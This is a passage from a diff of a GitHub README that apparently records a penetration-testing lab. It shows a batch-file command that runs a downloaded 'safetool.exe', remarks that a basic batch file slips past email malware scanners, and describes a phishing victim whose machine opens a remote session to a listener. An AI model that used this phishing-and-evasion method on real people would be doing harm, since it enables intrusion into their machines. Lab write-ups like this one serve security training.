kvweldon/Penetrating-an-Internal-Network/README.md

 "%userprofile%\Downloads\safetool.exe"

 These commands facilitate the download and execution of the exploit file on the victim's system.
 The strategic use of a basic batch file is effective in circumventing malware scanners that may otherwise detect and remove the exploit from an email.
+I saved the notepad and exited.

 ![image](https://github.com/kvweldon/Penetrating-an-Internal-Network/assets/141193154/44a81139-5023-4440-aacb-15c752b6a1fe)

-I saved the
+I then opened the File Explorer, selected downloads and double clicked on the trythis file to download the batch file.

 ![image](https://github.com/kvweldon/Penetrating-an-Internal-Network/assets/141193154/7e793e40-644a-4982-8ca9-2a57a5981999)

+Downloading the batch file caused the below command prompt to open, displaying the batch file's operations.
+As the email instructed, I minimized the window and continued my work day.
+The victim has been compromised and a remote control session has been established with the listener.

 ![image](https://github.com/kvweldon/Penetrating-an-Internal-Network/assets/141193154/b8b53073-7666-4ce2-afcc-84719bd5b36b)